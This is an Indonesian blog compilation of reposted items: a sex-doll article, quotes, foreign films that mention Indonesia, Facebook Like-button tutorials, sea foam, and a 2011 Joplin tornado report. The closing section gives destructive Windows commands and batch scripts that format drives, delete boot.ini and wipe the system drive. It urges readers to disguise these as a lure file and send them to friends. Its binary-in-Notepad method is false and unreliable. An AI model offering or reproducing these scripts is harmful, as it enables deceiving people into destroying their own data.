Teknologi Yang CANGGIH Dengan Membuat Boneka Anak ABG mIRIP aBIZ..

S-X Dolls: Aneh tapi sarat dengan teknologi tinggi

Lihat saja foto diatas, kalau dilihat sekilas pasti tidak ada yang menyangka bahwa foto wanita diatas adalah hanya sebuah boneka.Beberapa tahun belakangan ini, di Jepang sana ada beberapa perusahaan yang memfokuskan dirinya untuk membuat Sex Dolls yang benar-benar dibuat mirip dengan wanita dan salah satu perusahaan yang membuat adalah Orient Doll.

Mari kita lupakan masalah kegunaan dari Sex Dolls karena kami yakin semua pembaca pasti mengetahuinya. :-)

Terlepas dari siapa yang membeli atau orang seperti apa yang akan membelinya, harus diakui bahwa teknologi untuk membuat boneka seperti ini bukanlah teknologi biasa.Penggunaan bahan silicon atau soft vinyl membuat boneka ini mempunyai permukaan kulit dan teksture yang menyerupai manusia.
Untuk membuatnya lebih nyata, bahkan setiap boneka dijual dengan berbagai macam tinggi badan mulai dari 140 cm sampai 162 cm. Kita juga bisa memilih warna rambut, ukuran vital dan lainnya sesuai dengan keinginan.Semuanya benar-benar dibuat sempurna sehingga bagi orang-orang tertentu, boneka ini akan menjadi gadis impian. :-)

Tetapi tentu saja boneka seperti ini tidak bisa dimiliki oleh semua orang karena harga boneka ini mulai puluhan juta 50 juta rupiah sampai 100 jutaan.

Aneh?? Memang sih tapi ada penawaran karena biasanya ada permintaan. :D

http://www.otakku.com/

Kata2 Indah & Bermakna Dari Pakar

Kita tidak pernah bisa belajar jadi berani & sabar kalau di dunia ini hanya ada kebahagiaan (Hellen Keller)

Anda tidak akan pernah menemukan kedamaian dengan cara mengabaikan kehidupan (Virginia Wolf)

Kebahagiaan siapa pun akan membuat orang lain bahagia juga (Anne Frank)

Rasa kasihan ada diri sendiri adalah musuh terburuk di dunia ini (Hellen Keller)

Anda tidak tahu apa saja yang akan terjadi hanya saja tetaplah mencoba melakukan yang terbaik (Hillary Rhodam Clinton)

Tak ada sesuatu yang lebih menyenangkan daripada menimbulkan senyum pada wajah orang lain, terutama wajah orang yang kita cintai (RA Kartini)

Untukbisa menikmati kebebasan kita harus mengontrol diri sendiri (Virginia Wolf)

Tak seorang pesimis pin yang mampu menguak rahasia bintang-bintang (Hellen Keller)

Politik itu berat, ada banyak energi yang harus Anda curahkan (Hillary Rhodam Clinton)

Kemalasan memang tampak menggoda, tapi bekerja memberi kepuasan (Anne Frank)

Kebanggaan dan kepuasan dari kerja membuat saya insan yang lebih baik (Cindy Crawford)

Jauh lebih sulit membunuh bayang-bayang daripada membunuh sebuah realitas (Virginia Wolf)

Saya tidak punya cita-cita untuk diri saya sendiri. Cita-cita saya untuk Indonesia aga Indonesia jadi Negeri makmur (SK Trimurti)

Walau demokrasi di Indonesia tergolong baru, sudah banyak pencapaian yang didapat (Hillary Rhodam Clinton)

Yang luar biasa, Anda tidak perlu waktu khususuntuk mulai mengubah dunia (Anne Frank)

Mereka bisa karena mereka berpikir mereka bisa (Virginia Wolf)

Hasil tertinggi pendidikan adalah sikap teloransi (Hellen Keller)

Kalau kita tidak tahu siapa diri sendiri, kita tidak akan mencintai diri kita (Indayati Oetomo)

Anda tidak bisa ambil keputusan berdasarkan rasa takut atau apa yang mungkin terjadi di masa depan. Kita tidak bisa bangkit dengan cara itu (Michelle Obama)

Film-film asing yang membawa unsur Indonesia

 

 
 
 

1. ANACONDA 2: THE HUNT FOR THE BLOOD ORCHID
http://hermawayne.blogspot.com
Sekuel Anaconda ini bercerita tentang sekelompok ilmuwan yang melakukan ekspedisi untuk mencari anggrek berdarah yang langka yang dipercaya bisa membuat awet muda. Anggrek tersebut berada di suatu lokasi yang sangat terpencil yang dipenuhi oleh sejumlah flora dan fauna yang aneh-aneh, dan tentu saja si Anacondanya sendiri yang jumlah dan ukurannya sangat tidak biasa. Kalau hanya itu saja, orang mungkin akan menyangka bahwa setting lokasinya berada di pedalaman Afrika atau lembah Amazon yang memang terkenal tak tersentuh oleh manusia. Tapi, ya ternyata disebutkan bahwa ujung dunia tersebut adalah Borneo (Kalimantan), tapi konyolnya kondisi flora dan faunanya malah menggambarkan hutan amazon. Trus diceritakan menyusuri Sungai Mandranang dari Kota Baru (padahal gak ada sungai mandranang). Trus, Kota Baru tuh adanya di Pulau Laut Kalsel bukan di Kalimantan daratan. Trus ada lagunya Iwa K di sana yang berjudul Nombok Donk.

2. AROUND THE WORLD IN 80 DAYS (versi klasik)
http://hermawayne.blogspot.com
Di situ diceritain sebelum mereka berangkat, mereka milih negara mana yang dituju lewat brosur-brosur yang ada di travel agen. Salah satu brosur tentang Bali. Di film itu dibilang kalau Bali adalah pulau surga dengan perempuan berdada terbuka. Paling gak, ini sama kayak yang diceritain sama Adrian Vickers di bukunya, Bali; A Paradise Created tentang brosur wisata pertama tentang Bali yang dibikin sama agen travel Belanda tahun 1914. Nah, makanya brosur yang ada di film itu masuk akal. mengingat filmnya juga klasik.

3. AUTUMN IN NEW YORK
http://hermawayne.blogspot.com
Ada adegan dalam film ini waktu ceweknya sakit parah dan mau meninggal, intinya Richard Gere bilang kalau dia masih pengen ngajakin ceweknya itu keliling dunia, dan Bali disebut-sebut.

4. BATS (1999)
http://hermawayne.blogspot.com
Lagi-lagi Indonesia “dilibatkan” dalam sebuah eksperimen keblinger. Kelelawar-kelelawar yang dijadikan bahan percobaan oleh pemerintah dalam film ini berubah menjadi hewan yang beringas dan menyerang penduduk kota. Mau tahu dari mana asal kelelawar tersebut? Ya, Indonesia. Bahkan 2 kelelawar yang jadi “bintang” dalam film ini diambil langsung dari negara kita.

5. BRAINDEAD (1992)
http://hermawayne.blogspot.com
Ini adalah filmnya Peter Jackson sebelum terkenal. Braindead a.k.a Dead Alive sebuah horor komedi yang mengerikan dan menjijikan. Virusnya berasal dari kera Sumatra.

6. CHILDREN OF MEN
http://hermawayne.blogspot.com
Ada berita Jakarta kolaps di TV (seluruh dunia sih yang kolaps, trus Jakarta ikutan nongol deh).

7. DIE HARD I
http://hermawayne.blogspot.com
Dalam film ini Takagi, si pengusaha yang punya Nakatomi Plaza, mau bikin usaha kilang minyak di Sumatra atau Jawa.

8. DEVIL’S ADVOCATE
http://hermawayne.blogspot.com
Dalam film ini, Al Pacino sempet nyebut soal perdagangan senjata di Jakarta.

9. DUNSTON CHEK IN
http://hermawayne.blogspot.com
Film komedi yang mengisahkan seorang anak kecil dan monyetnya yang cerdas tanpa sengaja berhasil menggagalkan perampokan permata di Hotel Hilton, dan sebagai imbalan mereka boleh berlibur gratis di Hilton Bali. Yang bikin aneh adalah meskipun suasananya adalah Bali, lengkap dengan pantai dan pohon kelapa dan nuansa Bali lainnya, tapi orang-orangnya semuanya memakai kimono dan berbahasa Jepang!

10. ELEKTRA
http://hermawayne.blogspot.com
Gelang yang dia pakai berasal dari Indonesia.

11. FRIDAY THE 13TH
http://hermawayne.blogspot.com
Di film ini ada adegan saat ditampilkan di gudangnya ada topeng leak Bali.

12. 28 DAYS LATER
http://hermawayne.blogspot.com
Di film 28 Days later, di awal film, waktu para monyet di laboratorium disuguhi adegan kekerasan, salah satunya ada adegan dari kerusuhan Mei 98 di Indonesia.

13. Eat Pray Love
http://hermawayne.blogspot.com
Yang bintangnya Julia Robert, settingnya di Bali.

14. Alice In Wonderland (2010)
http://hermawayne.blogspot.com
Alice nyebutin sumatra dan borneo (bukan Jakarta) sambil buka peta Indonesia (tepatnya pulau Sumatera).

15. 3000 MILES TO GRACELAND
http://hermawayne.blogspot.com
Film yang dibintangi Kevin Costner ini pas lagi ledakin pom bensin pake puntung rokok Djarum Super Made in Indonesia.

16. xXx
http://hermawayne.blogspot.com
Di soundtracknya pas waktu habis terjun di ladang kokain ada kalimat tentang Indonesia, yang nyanyi itu `Fermin Iv’ judulnya 004 (cero cero cuatro): en el bar Fly pasa lo mismo, algo me lleva a una tienda de ropa de Indonesia, ¡Bamboleo!. Kalau tidak salah, itu bahasa Spanyol yang artinya dalam bahasa Inggris kurang lebih seperti ini : In the bar Fly it happens the same, something takes me to a store of clothes of Indonesia.

17. The Wild
http://hermawayne.blogspot.com
Dalam film kartun ini, seorang reporter mamalia, sering keliling dunia ngeliput satwa, salah satunya pernah ke Indonesia. Bahkan kera (si Darwin) yang ngikutin mereka didapat dari Borneo (Kalimantan) .

18. ITALIAN JOB
http://hermawayne.blogspot.com
Dalam film ini digambarkan batangan emasnya bergambar the Bali dancers. Emas di Italian Job memang ceritanya berasal dari tambang emas di Indonesia. Mungkin di filmnya gak terlalu spesifik, tapi di trailernya, si narator menyebut kalau emas ini diambil dari tambang di Indonesia.

19. WEDDING PLANNER
http://hermawayne.blogspot.com
Ceritanya si Jennifer Lopez jadi wedding planner yang nyusun perkawinan salah satu pelanggannya honeymoon ke Bali.

20. JUMANJI (1995)
http://hermawayne.blogspot.com
Permainan berbahaya yang dimainkan oleh Robin Williams ini, pada salah satu adegannya diceritakan bahwa ia kembali ke dunia nyata dengan berpakaian compang-camping dan bertingkah seperti orang sakit jiwa yang membahayakan lingkungannya. Kirsten Durnst berkata kepada polisi bahwa Williams adalah pamannya yang berasal dari Indonesia, sehingga polisi tidak jadi menangkapnya. Jumanji itu sendiri diceritakan permainan yang berasal dari Kalimantan, yang ditimpali Kirsten Dunts bilang gini “Sounds like Indonesian name”.

21. KING KONG (1933 dan 2005)
http://hermawayne.blogspot.com http://hermawayne.blogspot.com
Dibintangi oleh Adrien Brody, Naomi Watts, dan Jack Black, Indonesia digambarkan sebagai suatu negeri antah berantah yang primitif dan terbelakang, yang jauh berada nun jauh di sana, yang dihuni oleh binatang langka berjuluk King Kong dan penduduk pribumi yang sangat barbar, di Pulau Tengkorak (Skull Island), yang dikisahkan di sebelah barat Sumatera. Kapalnya juga bernama “Soerabaja”, tertulis di buritan kapal. Sedangkan syuting mengenai pulau itu dibuat di wilayah Thailand Selatan dan di Lyall Bay, Wellington. Padahal kalau melihat peta yang tercantum di film King Kong itu, Pulau Tengkorak itu tak lain adalah Pulau Nias.

22. THE KINGDOM
http://hermawayne.blogspot.com
Film ini tentang aksi terorisme di Arab Saudi dan diceritakan ancaman tentang aliran dana group radikal mengalir ke Jakarta.

23. KRAKATOA: EAST OF JAVA (1969)
http://hermawayne.blogspot.com
Nih film salah lokasi dan judulnya kali ya, harusnya “Krakatoa, West of Java”

24. LEGENDS OF THE FALL
http://hermawayne.blogspot.com
Si Brad Pitt diceritakan merantau ke berbagai tempat termasuk Sumatera dan Jawa. Bahkan dia dapat kalung gigi babi hutan dari Jawa.

25. LETHAL WEAPON 4 (1998)
http://hermawayne.blogspot.com
Dalam salah satu adegannya, Danny Glover memaki-maki dengan mimik khasnya, “Kapal bodoh ini dibuat oleh seorang yang berasal dari Indonesia”. Wah, ngeselin banget ya. Ceritanya imigran china yang diselundupkan pake kapal yang diatasnamakan sebuah perusahan di Indonesia, (tapi fiktif). Coba deh perhatikan waktu Mel Gibson and the geng lagi ngobrol di markas sebelum menyerbu Uncle Benny. Jadi, Indonesia digambarkan sebagai negara yang “selalu bikin kacau”.

26. MATA HARI
http://hermawayne.blogspot.com
Film ini ceritanya tentang mata-mata (spy) Belanda (dan Inggris) keturunan Jawa-Belanda yang lahir di Jawa. Film ini berlatar belakang PD II dan judulnya sama dengan nama si mata-mata ini. Cewek yang memanfaatkan sensualitasnya buat nyari data dari musuh.

27. THE SAINT
http://hermawayne.blogspot.com
Dalam film ini waktu pemeran utamanya nerima e-mail dari laptop, di situ ada tulisan Bali Indonesia dan Jakarta.

28. NEEDFULL THING
http://hermawayne.blogspot.com
Film tentang iblis yang membuat kacau sebuah kota yang damai. Iblis yang mengadu domba seluruh penduduk 1 kota. Pemain utamanya seorang polisi. Di akhir film si iblis bersumpah akan membalas dendam, dengan bekerja sama dengan anak si polisi itu di masa depan (2014), di Jakarta.

29. NEVER BEEN KISSED
http://hermawayne.blogspot.com
Dalam film ini pas adegan di kelas, guru geografinya ngasih pelajaran mengenai pulau Bali sebagai “The island nation of Bali”. Waktu Drew Barrymore untuk pertama kalinya masuk kelas nyamar sebagai wartawan yang jadi murid SMU, trus gurunya nyebutin Bali itu sebagai salah satu budaya di dunia.

30. NO RESERVATIONS
http://hermawayne.blogspot.com
Dalam film ini ada scene pas si Kate (Catherine Zeta Jones) beli bumbu dapur (rempah-rempah) untuk bikin resep rahasianya. Trus di sebelah toko itu ada restoran Indonesia ‘Groceries for Indonesia’.

31. NOTHING HILL
http://hermawayne.blogspot.com
Dalam film ini ada adegan buku yang direkomendasikan Hugh Grant pada Julia Robert, yaitu tentang pulau Bali.

32. POINT BREAK
http://hermawayne.blogspot.com
Film yang dibintangi sama Keanu Reeves bercerita tentang agent CIA yang ngejar penjahatnya seorang surfer sampai ke Sumatra, Bali, dan akhirnya di Australia saat penjahatnya mau surfing pada saat ada badai.

33. PROOF OF LIFE
http://hermawayne.blogspot.com
Cerita tentang agen khusus pembebasan sandera, salah satu target operasinya adalah di Indonesia (Jakarta).

34. SNAKE ON THE PLANE
http://hermawayne.blogspot.com
Film itu lakonnya mau liburan di Bali. Dengan jeLas beberapa kali disebut salah satu tempat di Indonesia yakni Bali. Bahkan beberapa kali pantai Kuta dengan ombak surfingnya dishoot, ada dalam scene awal dan akhir-akhir film. Akhir film, Samuel L. Jackson sama si anak itu surfing di Bali.

35. SPIDERMAN 2
http://hermawayne.blogspot.com
Dalam film ini ada adegan yang menampilkan topeng barong dari Bali di kamar Orsborne waktu dia mengira dimana keluarnya suara Green Goblin.

36. STRANGERS WITH CANDY
http://hermawayne.blogspot.com
Ini film garing yang kira-kira dialognya:
Cewe: Where you’re from?
Cowo: Jakarta, Indonesia.
Cewe: What’s your name?
Cowo: Megawati soekarnoputri.
Cewe: ?? (sambil ngeliat bingung ke cowo itu)
Cowo: What? it’s a common name in Indonesia.

37. THE SWEETEST THING (2002)
http://hermawayne.blogspot.com
Dalam film drama psikologi ini, si cantik Cameron Diaz ternyata juga “bermulut sampah” saat mengeluh karena teman-temannya selalu saja membuat ulah dan mengacau. Dengan enteng dia berkomentar, “Kalian ini bikin kacau saja seperti Indonesia”. Selain itu, waktu Christina Applegate masuk apartemen dan ngeliat apartemennya berantakan dipake ML gila-gilaan oleh Selma Blair, Christina bilang gini “This place is a mess like Indonesia”. Jadi, ruangan kayak kapal pecah itu disamakan kaya Indonesia

38. TALADEGA NIGHT: THE BALLAD OF RICKY BOBBY
http://hermawayne.blogspot.com
Another film kocak dari Will Ferell. Ada adegan suporter/anak-anaknya neriakin musuh dengan kata-kata “send that freak back to Indonesia!”. Padahal si freak itu sendiri orang Prancis yang gay.

39. TOUTE LA BEAUTE DU MONDE
http://hermawayne.blogspot.com
Film Perancis ini syutingnya di Perancis, Bali, Lombok dan Thailand. Musik latarnya pake lagu Anang dan Krisdayanti dan satu lagu Mayangsari.

40. THE CONDEMNED (2007)
http://hermawayne.blogspot.com
Dalam fim yang dibintangi oleh Steve Austin ini bercerita tentang seorang produser TV yang membuat reality show tentang 10 orang yang dipaksa berkelahi. Kesepuluh orang tersebut adalah terpidana mati yang dibeli dari negara-negara dunia ketiga. Mereka akan ditempatkan di pulau terpencil, dan harus membunuh satu sama lain. Satu pemenang tersisa akan dibebaskan dari penjara dan terhindar dari eksekusi. Nah, dalam acaranya itu berada di lintang perairan Indonesia, karena banyak pulau-pulau kecil tidak berpenghuni.

41. THE YEAR OF LIVING DANGEROUSLY (1982)
http://hermawayne.blogspot.com
Film ini berkisah tentang seorang wartawan yang dikirim untuk bertugas di Jakarta pada tahun 1965-1966. Saat itu, Indonesia yang dipimpin oleh Presiden Soekarno sedang mengalami krisis politik dan ekonomi. Tak heran, situasi Jakarta digambarkan sangat kacau, lengkap dengan embel-embel penduduk yang merana karena kelaparan. Dimeriahkan oleh akting dari Mel Gibson dan Sigourney Weaver. Syutingnya sendiri dilaksanakan di Bangkok, karena tidak diijinkan pemerintah di Jakarta. (tanya kenapa?). Hehehe. Akibatnya meski ada beberapa dialog menggunakan Bahasa Indonesia, namun karena aktornya adalah orang Bangkok, maka ucapannya terdengar aneh di telinga. Adegan yang paling terkenal sewaktu temennya Mel Gibson, Billy Kwan (ni artis cewek cuman di film ini main jadi cowok) ngegantungin spanduk di Hotel Indonesia (ceritanya) dengan tulisan SOEKARNO FEED YOUR PEOPLE. Saat Oscar 1982, film ini menang untuk artis terbaik Linda Hunt. Fim ini gak cuman nyebutin Indonesia tapi tentang Indonesia. Jadi, dalam film ini, Indonesia digambarkan sebagai negara penuh konflik.

42. THE ISLAND OF DR. MOREAU (1996)
http://hermawayne.blogspot.com
Film tentang obsesi seorang ilmuwan sinting untuk menggabungkan manusia dan hewan menjadi suatu spesies baru. Lokasi penelitiannya berada di suatu pulau terpencil di kawasan Indonesia Timur. Setting dan kisah film ini sebenarnya tidak perlu “diambil hati” kalau saja yang membuatnya bukan sutradara kawakan John Frankenheimer. Untuk mempertegas posisi Indonesia-nya, bahkan kapalnya bernama “Ombak Penari” terus si awak kapalnya pas dah mau nyampe di pulau itu ada yang ngomong pake Bahasa Indonesia. Padahal nama kapal itu terbalik. Dalam versi novel yang ditulis H.G. Wells, kapal yang ada di film ini bernama Ipencacuanha. Di versi film, nama kapalnya berubah menjadi Ombak Penari yang diambil dari kata Wave Dancer. Padahal disesuaikan dengan grammar, seharusnya terjemahannya adalah Penari Ombak.

43. THE SILENCE OF THE LAMBS
http://hermawayne.blogspot.com
Dalam film yang thriller psikologi yang dibintangi Jodie Foster ini ada adegan dimana di sweater orang yang diculik kanibal itu tertulis “MADE IN INDONESIA”. Apakah image Indonesia sudah sebagai negara yang banyak penculikan atau karena kita produsen tekstil?

 

http://hermawayne.blogspot.com/

Foto indoor dengan megapixels terbesar di dunia saat ini

Sudah beberapa bulan belakangan ini kita sering melihat foto panorama dengan ukuran megapixels yang sangat besar sehingga kita bisa melihat semua detil yang ada pada foto tersebut seperti yang ini dan ini.Yang baru kali ini adalah sebuah foto dengan 40 Gigapixels yang menampilkan foto indoor di sebuah perpustakaan di Strahov Library, Ceko.
Foto ini menjadi sebuah foto indoor dengan megapixels terbesar di dunia saat ini dimana terdapat 2.947 foto yang digabungkan menjadi satu.Coba kunjungi langsung situsnya disini dan lihat bagaimana anda bisa men-zoom dengan sangat detil untuk setiap buku, lengkap dengan judulnya yang terlihat jelas. :-)

Gambar lainnya, memperlihatkan sekilas bagaimana membuat foto panorama ini.

Cara Membuat Tombol LIKE-SUKA FB di BLOG WORDPRESS

Cara Membuat Tombol LIKE-SUKA FB di BLOG WORDPRESS

Facebook like di wordpress
Facebook like di wordpress

Saya akan sedikit membahas cara menampilkan tombol like FaceBook seperti yang banyak ditanyakan oleh para rekan bootingskoBlog.

Untuk menampilkan tombol like FaceBook sendiri caranya sangat mudah. Namun mungkin bagi rekan yang belum mengetahuinya dirasa sangat sulit. Dikarenakan sewaktu mengaktifkan tombol share FaceBook yang tampil secara default adalah tombol share yang berguna untuk menyebarkan artikel yang disuka oleh pembaca ke akun FaceBooknya. Dan bukan tombol like FaceBook.

Fungsi dari kedua tombol share FaceBook (share button dan like button) ini memiliki kegunaan yang sama-sama menguntungkan. Dan itu semua tergantung keperluan pribadi masing-masing.

Sebelum pada topiknya, Saya akan sedikit menyentuh mengenai fungsi tombol share faceBook dan tombol like FaceBook. Tombol share FaceBook ini berfungsi untuk memudahkan pembaca menyebarkan artikel yang disuka ke dalam akun FaceBook mereka. Biasanya artikel setelah di share ke akun FaceBook berupa judul dan sedikit potongan diskripsi dari artikel.

Sedangkan tombol like FaceBook berfungsi memudahkan pengguna FaceBook untuk memberi nilai suka terhadap artikel yang dibacanya.

Kedua tombol ini sama-sama menguntungkan bagi blog kita untuk menambah trafik. Karena setiap kali para pengguna FaceBook men-share dan men-vote artikel kita maka akan tercatat dalam wall akun FaceBook mereka. Yang secara otomatis juga tampil di beranda teman-teman mereka. Sekarang bayangkan jika orang yang men-share di FaceBooknya tersebut memiliki sedikitnya 100 teman, dan temannya itu juga suka kemudian ikut men-share lagi. Sudah berapa trafik ke blog Anda? Itu cuma 1 orang saja, kalau 10 orang lebih tinggal Anda kalkulasi sendiri.

Berikut cara untuk menampilkan tombol like FaceBook:

1. Login ke akun WordPress.com anda.
2. Kemudian klik [Settings] > [Sharing].
facebook-like-wordpress

3. Dan akan tampil halaman Sharing Settings.
4. Silahkan anda drag and drop (tahan dan geser) tombol icon share FaceBook yang berada di menu “Available Services” ke menu “Enabled Services” untuk menampilkannya.

like facebook wordpress

5. Kemudian lakukan perubahan tampilan pada icon share FaceBook dengan cara klik tanda [ ▼ ] disamping kanan icon share FaceBook.

facebook-like-wordpress2

6. Pilih [Like button].

7. Dan lakukan pengaturannya tambahan sesuai keinginan anda:

facebook-like-wordpress3

8. Setelah selesai klik tombol [Save Changes].

Tips Cara Membuat MEMASANG Tombol LIKE-SUKA FACEBOOK di BLOG WORDPRESS ini, saya ambil dari master yaitu dari: bootingskoBlog

http://catatancakhuda.wordpress.com/2011/04/29/cara-membuat-tombol-like-suka-fb-di-blog-wordpress/

Pasang Tombol Facebook Like di blogger

Posting berikut merupakan realisasi dari fasilitas “Tanya Saja!” yang di luncurkan kang Rohman. Dan berikut adalah pertanyaan yang masuk ;

Kang saya mau tanya. Gimana ya cara buat di setiap postingan ada script “Like” kaya di facebook?

Jawaban :

tombol-facebook-like Yang dimaksud Script Like dari pertanyaan diatas mungkin adalah tombol Facebook Like yang seperti

ada di facebook kali yah, koreksi jika salah Winking.

Tombol facebook Like berfungsi untuk mempermudah pengunjung blog anda untuk berbagi atau merekomendasikan artikel anda ke teman-teman mereka yang ada di facebook. Hal ini tentu saja apabila postingan anda dirasa bermanfaat bagi mereka dan ingin memberitahukan kepada teman-temannya.

Memasang tombol facebook like merupakan salah satu trik untuk mendapatkan jumlah pengunjung yang melimpah dari mereka para penggemar facebook, mengingat facebook merupakan situs jejaring sosial paling populer saat ini. Jadi, bagaimana cara memasang tombol facebook like di blogger?

Cara mengambil kode Tombol Facebook Like

Pada dasarnya, untuk mendapatkan tombol face book like, anda bisa mengambil dari halaman Facebook develover. Anda tinggal memasukkan beberapa settingan dan kode facebook like akan di generate.

Namun, agar tidak repot khusus untuk tombol facebook like yang kan di pasang di postingan blogger berikut adalah kodenya :

<iframe expr:src='&quot;http://www.facebook.com/plugins/like.php?href=&quot; + data:post.url + &quot;&amp;action=like&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;font=arial&amp;colorscheme=light&quot;' allowTransparency='true' frameborder='0' scrolling='no' style='border:none; overflow:hidden; width:450px; height:25px;'/>

Cara pasang tombol Facebook Like di postingan blogger

Untuk pemasangan tombol facebook like, pertama yang harus dipikirkan adalah dimana anda akan memasangnya? diatas postingan atau di bawah postingan? hal lainnya yaitu apakah tombol tersebut akan muncul terus baik di halaman depan ( homepage) ataupun didalam postingan? atau hanya ingin muncul dihalaman depan saja (homepage)? atau mungkin anda hanya ingin tombol tersebut hanya muncul didalam posting saja?

Secara mendasar, kode posting blogger adalah seperti ini :

<data:post.body/>

Logika sederhana, apabila anda ingin memasang tombol facebook like diatas posting, tinggal simpan saja diatas diatas kode yang tadi. Sebaliknya, jika anda ingin memasangnya di bawah postingan, tinggal disimpan dibawahnya saja. berikut ilustrasi dasarnya :

Agar tombol letaknya muncul diatas posting :

< kode tombol facebook like  disini >

<data:post.body/>

Agar tombol letaknya muncul dibawah posting :

<data:post.body/>

< kode tombol facebook like  disini >

Agar tombol facebook like hanya muncul  di halaman depan saja (homepage) :

<b:if cond=’data:blog.url == data:blog.homepageUrl’>

<data:post.body/>

< kode tombol facebook like  disini >

</b:if>

Agar tombol facebook like hanya muncul  di halaman posting saja (single post) :

<b:if cond=’data:blog.pageType == &quot;item&quot;’>

<data:post.body/>

< kode tombol facebook like  disini >

</b:if>

Diatas hanyalah sebagai ilustrasi saja. Berikut adalah cara sebenarnya untuk memasang tombol facebook like, namun sebagai contoh saja, kang Rohman akan mencontohkan untuk pemasangan di bawah posting dan akan muncul baik di homepage ataupun di single post.

  1. Silahkan login ke blogger dengan ID anda.
  2. Klik Rancangan.rancangan
  3. Klik tab Edit HTML.edit html
  4. Lakukan backup terlebih dahulu template anda dengan klik Download Template Lengkap. backup template
  5. Beri tanda centang pada kotak kecil disamping tulisan Expand Template Widget.expand template
  6. Silahkan cari kode berikut pada template anda ( tips : gunakan fasilitas find pada browser anda agar lebih cepat dalam pencarian, tekan Ctrl+Funtuk mengaktifkan, lalu masukkan kode yg dicari).

    <data:post.body/>

  7. Copy kode berikut, lalu paste dibawah kode yang tadi :
    <iframe expr:src='&quot;http://www.facebook.com/plugins/like.php?href=&quot; + data:post.url + &quot;&amp;action=like&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;font=arial&amp;colorscheme=light&quot;' allowTransparency='true' frameborder='0' scrolling='no' style='border:none; overflow:hidden; width:450px; height:25px;'/>
    

    code

  8. Klik tombol SIMPAN TEMPLATE.
  9. Selesai.

http://kolom-tutorial.blogspot.com/2010/07/pasang-tombol-facebook-like-di-blogger.html

Beraneka Macam Pemandangan dari Laut

Adalah keanehan air laut yang mengeluarkan busa dalam jumlah besar.

Pantai busa di bentuk dibawah kondisi normal

Busa Laut terbentuk selama kondisi badai dan menyusul mekar alga bulan Oktober 1996

Busa laut, atau pantai busa adalah jenis busa yang diciptakan oleh agitasi air laut, terutama ketika mengandung konsentrasi lebih tinggi dari bahan organik terlarut (termasuk protein, lignins, dan lipid) yang berasal dari sumber-sumber seperti lepas pantai rincian mekar alga. Senyawa ini dapat bertindak sebagai surfaktan atau agen berbusa.Seperti air laut yang menggulung dengan memecah gelombang di surf zone berdekatan dengan pantai, kehadiran surfaktan tersebut di bawah ini perangkap kondisi udara bergolak, membentuk gelembung gigih yang menempel satu sama lain melalui tegangan permukaan. Karena kerapatan yang rendah dan ketekunan, busa bisa tertiup angin dari beachface sampai di darat ke pedalaman ke trotoar dan jalan-jalan.
source wikipedia

http://www.keajaibanalam.co.tv/

Badai di AS, 119 Orang Tewas Terkubur Puing

“Bisa saya katakan sekitar 75 persen kota sudah musnah.”

VIVAnews – Badai tornado yang menerpa kota Joplin, negara bagian Missouri, Amerika Serikat (AS), menewaskan sedikitnya 119 orang. Badai yang meluluhlantakkan hampir seluruh kota itu disebut-sebut sebagai badai tornado terbesar di AS selama lebih dari 50 tahun.

Dilansir dari laman CNN, Senin, 23 Mei 2011, pemerintah kota mengerahkan 1.000 orang polisi, 500 pemadam kebakaran dan 140 pasukan garda nasional untuk membantu proses pencarian korban. Upaya pencarian ini dipersulit oleh matinya jalur komunikasi dan terputusnya akses jalan.

Sejauh ini, korban tewas yang mereka temukan sedikitnya 119 orang. Pada Senin malam, 17 orang berhasil di selamatkan dari dalam reruntuhan rumah mereka. Namun, juru bicara pemerintahan Missouri, Jay Nixon, mengatakan bahwa dia optimistis masih banyak lagi korban yang akan mereka selamatkan.

“Kami akan mencari di setiap inci kota ini. Kami optimistis masih ada banyak lagi nyawa yang akan diselamatkan,” ujar Nixon.

Upaya penyelamatan juga dipersulit oleh masih buruknya cuaca di lapangan. Badan ramalan cuaca Missouri mengatakan bahwa badai masih akan terjadi pada Selasa waktu setempat. Kemungkinan terjadinya badai adalah 45 persen, dengan waktu puncak pada jam 4 sore maupun tengah malam.

Badai berkekuatan hingga 300 km/jam yang terjadi pada Senin, 23 Mei 2011, membuat hampir 75 persen kota berpenduduk 50.500 orang itu luluhlantak. Beberapa fasilitas penting, diantaranya adalah rumah sakit dan pembangkit listrik dilaporkan hancur. Puing-puing dan pohon tumbang menutup hampir sebagian besar ruas jalan.

Badai ini disebut-sebut adalah badai terbesar sejak tornado menghantam Michigan pada 8 Juni 1953 yang menewaskan 116 orang dan melukai ratusan lainnya.

Nixon mengatakan bahwa dia telah berbicara dengan Presiden AS, Barack Obama, yang saat ini tengah menjalani tur sepekannya ke Eropa. Obama, ujarnya, telah mendeklarasikan tanggap bencana dan memerintahkan pengerahan bala bantuan dari berbagai daerah di sekitar Joplin. (eh)

dunia.vivanews.com/

Cara Memformat Hard disk Menggunakan Notepad

Mau tau cara memformat harddisk menggunakan notepad? yang penting Jangan dicoba di PC Anda, hanya untuk pengetahuan saja yah, sekalian nambah ilmu. , yuk mulai:


Langkah Pertama:

Copy kode binary berikut ke notepad, sebelumnya buka dulu program notepad yah, kl ga tau cara buka notepad klik Start–>All Programs–>accessories klik Notepad.

01001011000111110010010101010101010000011111100000

Langkah Kedua:

Simpanlah dengan ekstensi file .EXE mau nama apa terserah anda. atau coba simpan dengan nama cewe_bugil.exe :p

Langkah Ketiga: kirim buat teman atau orang yg mau dikerjain .

Jika anda fikir kita tidak dapat memformat harddisk dalam kondisi windows sedang aktiv? coba terka…, kalo ngga coba test dengan harddisk yang lain, coba kode simpel binary berikut:

format c:\ /Q/X — ini akan memformat drive c:\

Kode:



01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — ini akan memformat drive d:\

Kode:



01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — ini akan memformat drive a:\

Kode:



01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — ini akan menyebabkan komputer tidak akan booting. 

Kode:



01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

Coba fikir lebih kreatif? atau mau yang lebih keren lagi coba ini:

Buka notepad dan masukin:



@Echo off

Del C:\ *.*|y

Simpan dengan nama Gue.bat 

atau mau yang lebih menyeramkan?



@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

Simpan dengan nama apa.bat atau apa saja sesuai dengan kesukaan. , kirim buat teman yah

http://tulisan-menarik.blogspot.com/

